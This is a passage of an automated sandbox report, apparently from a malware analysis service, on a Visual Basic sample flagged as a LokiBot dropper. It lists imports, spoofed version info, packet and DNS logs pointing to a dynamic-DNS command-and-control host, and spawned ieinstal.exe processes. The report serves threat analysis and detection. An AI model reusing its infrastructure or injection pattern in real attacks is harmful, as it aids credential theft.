_CIcos, _adj_fptan, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, __vbaFpI4, _CIatan, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0404 0x04b0
InternalName	Indk
FileVersion	1.00
CompanyName	Double Fine Productions
ProductName	pedersup
ProductVersion	1.00
OriginalFilename	Indk.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2021 10:53:20.766922951 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:20.823081017 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:20.823168039 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:20.823437929 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:20.879442930 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:20.895345926 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:20.895401001 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:20.895416975 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:20.895440102 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:20.895452023 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:20.895477057 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:20.895482063 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:20.895606995 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:20.912841082 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:20.968964100 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:20.969053030 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:20.969628096 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.031261921 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.261328936 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.261408091 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.261425972 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.261464119 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.261499882 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.261537075 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.261557102 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.261580944 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.265063047 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.265103102 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.265171051 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.268974066 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.269012928 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.269201994 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.272942066 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.272984028 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.273461103 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.276855946 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.276897907 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.276936054 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.276978016 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.280827045 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.280865908 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.280909061 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.280947924 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.318664074 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.318722010 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.318962097 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.320337057 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.320380926 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.320449114 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.324271917 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.324310064 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.324363947 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.328182936 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.328222990 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.328283072 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.328294992 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.332104921 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.332146883 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.332258940 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.336051941 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.336093903 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.336116076 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.336188078 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.340054989 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.340095997 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.340145111 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.340207100 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.343859911 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.343898058 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.346590996 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.347810030 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.347856998 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.348001957 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.351386070 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.351429939 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.351514101 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.354980946 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.355031013 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:53:21.355355024 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:53:21.642402887 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:53:21.960416079 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:21.963282108 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:53:21.968240023 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:53:22.430535078 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:22.432693005 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:53:22.845890045 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:27.740245104 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:27.743638039 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:53:28.462609053 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:53:28.585475922 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:29.310122967 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:32.850227118 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:32.854650974 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:53:33.230793953 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:37.946436882 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:37.951366901 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:53:38.315107107 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:43.060806036 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:43.065222025 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:53:43.425030947 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:48.160830021 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:48.163072109 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:53:48.776773930 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:53:49.011277914 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:53.260400057 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:53.263916969 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:53:53.830781937 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:58.380203009 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:53:58.382687092 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:53:58.735274076 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:03.465254068 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:03.471226931 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:04.169136047 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:04.635286093 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:05.315125942 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:08.570230961 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:08.574919939 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:08.931062937 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:13.660552025 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:13.717464924 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:13.878546000 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:14.320108891 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:18.781311989 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:18.783282995 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:19.255178928 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:23.870963097 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:23.876518011 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:24.390089035 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:28.950432062 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:28.952836037 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:29.420831919 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:34.085776091 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:34.089370012 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:34.440268993 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:39.170017958 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:39.173542023 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:39.510077953 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:45.244076014 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:45.247277975 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:45.937865019 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:46.155833006 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:46.159660101 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:46.656635046 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:46.801151991 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:46.801415920 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:46.840358019 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:47.595515013 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:47.955761909 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:49.630258083 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:49.633275986 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:50.039885998 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:54.615406036 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:54:54.620038033 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:54:54.937520981 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:00.580204010 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:00.582900047 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:55:00.945652962 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:00.946177006 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:55:01.210242033 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:04.910409927 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:04.918302059 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:55:05.330326080 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:09.860299110 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:55:09.917346001 CET	443	49732	142.250.180.97	192.168.2.3
Jan 8, 2021 10:55:09.917996883 CET	49732	443	192.168.2.3	142.250.180.97
Jan 8, 2021 10:55:09.940839052 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:09.943355083 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:55:10.335766077 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:15.050400972 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:15.059520960 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:55:15.431384087 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:20.165123940 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:20.199815989 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:55:20.540939093 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:25.870383978 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:25.871900082 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:55:26.464931011 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:26.465073109 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:55:26.612736940 CET	49733	52360	192.168.2.3	185.157.161.61
Jan 8, 2021 10:55:27.015033007 CET	52360	49733	185.157.161.61	192.168.2.3
Jan 8, 2021 10:55:27.195431948 CET	52360	49733	185.157.161.61	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2021 10:52:28.529969931 CET	65110	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:52:28.591248035 CET	53	65110	8.8.8.8	192.168.2.3
Jan 8, 2021 10:52:29.777122021 CET	58361	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:52:29.825268984 CET	53	58361	8.8.8.8	192.168.2.3
Jan 8, 2021 10:52:32.966675043 CET	63492	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:52:33.017491102 CET	53	63492	8.8.8.8	192.168.2.3
Jan 8, 2021 10:52:33.901746988 CET	60831	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:52:33.952558994 CET	53	60831	8.8.8.8	192.168.2.3
Jan 8, 2021 10:52:34.893409014 CET	60100	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:52:34.944257975 CET	53	60100	8.8.8.8	192.168.2.3
Jan 8, 2021 10:52:37.457941055 CET	53195	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:52:37.506099939 CET	53	53195	8.8.8.8	192.168.2.3
Jan 8, 2021 10:52:38.394639969 CET	50141	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:52:38.445633888 CET	53	50141	8.8.8.8	192.168.2.3
Jan 8, 2021 10:52:39.329952955 CET	53023	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:52:39.377959013 CET	53	53023	8.8.8.8	192.168.2.3
Jan 8, 2021 10:52:40.264322996 CET	49563	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:52:40.312146902 CET	53	49563	8.8.8.8	192.168.2.3
Jan 8, 2021 10:52:41.068795919 CET	51352	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:52:41.116837025 CET	53	51352	8.8.8.8	192.168.2.3
Jan 8, 2021 10:52:42.013433933 CET	59349	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:52:42.061342955 CET	53	59349	8.8.8.8	192.168.2.3
Jan 8, 2021 10:52:43.037942886 CET	57084	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:52:43.085737944 CET	53	57084	8.8.8.8	192.168.2.3
Jan 8, 2021 10:52:43.950128078 CET	58823	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:52:43.998193026 CET	53	58823	8.8.8.8	192.168.2.3
Jan 8, 2021 10:53:00.657679081 CET	57568	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:53:00.715337992 CET	53	57568	8.8.8.8	192.168.2.3
Jan 8, 2021 10:53:09.494474888 CET	50540	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:53:09.545334101 CET	53	50540	8.8.8.8	192.168.2.3
Jan 8, 2021 10:53:09.948648930 CET	54366	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:53:09.997792006 CET	53	54366	8.8.8.8	192.168.2.3
Jan 8, 2021 10:53:16.816397905 CET	53034	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:53:16.872641087 CET	53	53034	8.8.8.8	192.168.2.3
Jan 8, 2021 10:53:17.719058037 CET	57762	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:53:17.767122030 CET	53	57762	8.8.8.8	192.168.2.3
Jan 8, 2021 10:53:19.823319912 CET	55435	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:53:19.879618883 CET	53	55435	8.8.8.8	192.168.2.3
Jan 8, 2021 10:53:20.698334932 CET	50713	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:53:20.765464067 CET	53	50713	8.8.8.8	192.168.2.3
Jan 8, 2021 10:53:21.430490971 CET	56132	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:53:21.639633894 CET	53	56132	8.8.8.8	192.168.2.3
Jan 8, 2021 10:53:29.345299959 CET	58987	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:53:29.412123919 CET	53	58987	8.8.8.8	192.168.2.3
Jan 8, 2021 10:53:43.837730885 CET	56579	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:53:43.896121979 CET	53	56579	8.8.8.8	192.168.2.3
Jan 8, 2021 10:53:45.281579018 CET	60633	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:53:45.329572916 CET	53	60633	8.8.8.8	192.168.2.3
Jan 8, 2021 10:53:46.991930008 CET	61292	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:53:47.056533098 CET	53	61292	8.8.8.8	192.168.2.3
Jan 8, 2021 10:53:48.817679882 CET	63619	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:53:48.874207020 CET	53	63619	8.8.8.8	192.168.2.3
Jan 8, 2021 10:54:20.013230085 CET	64938	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:54:21.097022057 CET	64938	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:54:22.108501911 CET	64938	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:54:22.158987999 CET	53	64938	8.8.8.8	192.168.2.3
Jan 8, 2021 10:54:24.428479910 CET	61946	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:54:24.487639904 CET	53	61946	8.8.8.8	192.168.2.3
Jan 8, 2021 10:55:18.426589966 CET	64910	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:55:18.534686089 CET	53	64910	8.8.8.8	192.168.2.3
Jan 8, 2021 10:55:20.367820024 CET	52123	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:55:20.427015066 CET	53	52123	8.8.8.8	192.168.2.3
Jan 8, 2021 10:55:21.083848953 CET	56130	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:55:21.193069935 CET	53	56130	8.8.8.8	192.168.2.3
Jan 8, 2021 10:55:21.646823883 CET	56338	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:55:21.703259945 CET	53	56338	8.8.8.8	192.168.2.3
Jan 8, 2021 10:55:22.222898960 CET	59420	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:55:22.279115915 CET	53	59420	8.8.8.8	192.168.2.3
Jan 8, 2021 10:55:22.721251011 CET	58784	53	192.168.2.3	8.8.8.8
Jan 8, 2021 10:55:22.777802944 CET	53	58784	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 8, 2021 10:53:20.698334932 CET	192.168.2.3	8.8.8.8	0x6f30	Standard query (0)	doc-0c-8c-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Jan 8, 2021 10:53:21.430490971 CET	192.168.2.3	8.8.8.8	0xdb7c	Standard query (0)	wealthyblessed.myddns.rocks	A (IP address)	IN (0x0001)
Jan 8, 2021 10:53:46.991930008 CET	192.168.2.3	8.8.8.8	0x6fea	Standard query (0)	g.msn.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 8, 2021 10:53:09.545334101 CET	8.8.8.8	192.168.2.3	0x8434	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Jan 8, 2021 10:53:20.765464067 CET	8.8.8.8	192.168.2.3	0x6f30	No error (0)	doc-0c-8c-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Jan 8, 2021 10:53:20.765464067 CET	8.8.8.8	192.168.2.3	0x6f30	No error (0)	googlehosted.l.googleusercontent.com		142.250.180.97	A (IP address)	IN (0x0001)
Jan 8, 2021 10:53:21.639633894 CET	8.8.8.8	192.168.2.3	0xdb7c	No error (0)	wealthyblessed.myddns.rocks		185.157.161.61	A (IP address)	IN (0x0001)
Jan 8, 2021 10:53:47.056533098 CET	8.8.8.8	192.168.2.3	0x6fea	No error (0)	g.msn.com	g-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 8, 2021 10:53:20.895477057 CET	142.250.180.97	443	192.168.2.3	49732	CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Tue Dec 15 15:47:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017	Tue Mar 09 15:47:08 CET 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jan 8, 2021 10:53:20.895477057 CET	142.250.180.97	443	192.168.2.3	49732	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.generic.ml.exe PID: 908 Parent PID: 5804

General

Start time:	10:52:32
Start date:	08/01/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Imagebase:	0x400000
File size:	73728 bytes
MD5 hash:	0640F43C412F8F2C3BF6E1B9139DB1D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.313168282.0000000000409000.00000020.00020000.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000000.205779909.0000000000409000.00000020.00020000.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: ieinstal.exe PID: 6588 Parent PID: 908

General

Start time:	10:53:08
Start date:	08/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Imagebase:	0x3c0000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ieinstal.exe PID: 6612 Parent PID: 908

General

Start time:	10:53:08
Start date:	08/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Imagebase:	0x3c0000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ieinstal.exe PID: 6640 Parent PID: 908

General

Start time:	10:53:08
Start date:	08/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Imagebase:	0x3c0000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ieinstal.exe PID: 6680 Parent PID: 908

General

Start time:	10:53:09
Start date:	08/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Imagebase:	0x3c0000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ieinstal.exe PID: 6724 Parent PID: 908

General

Start time:	10:53:09
Start date:	08/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
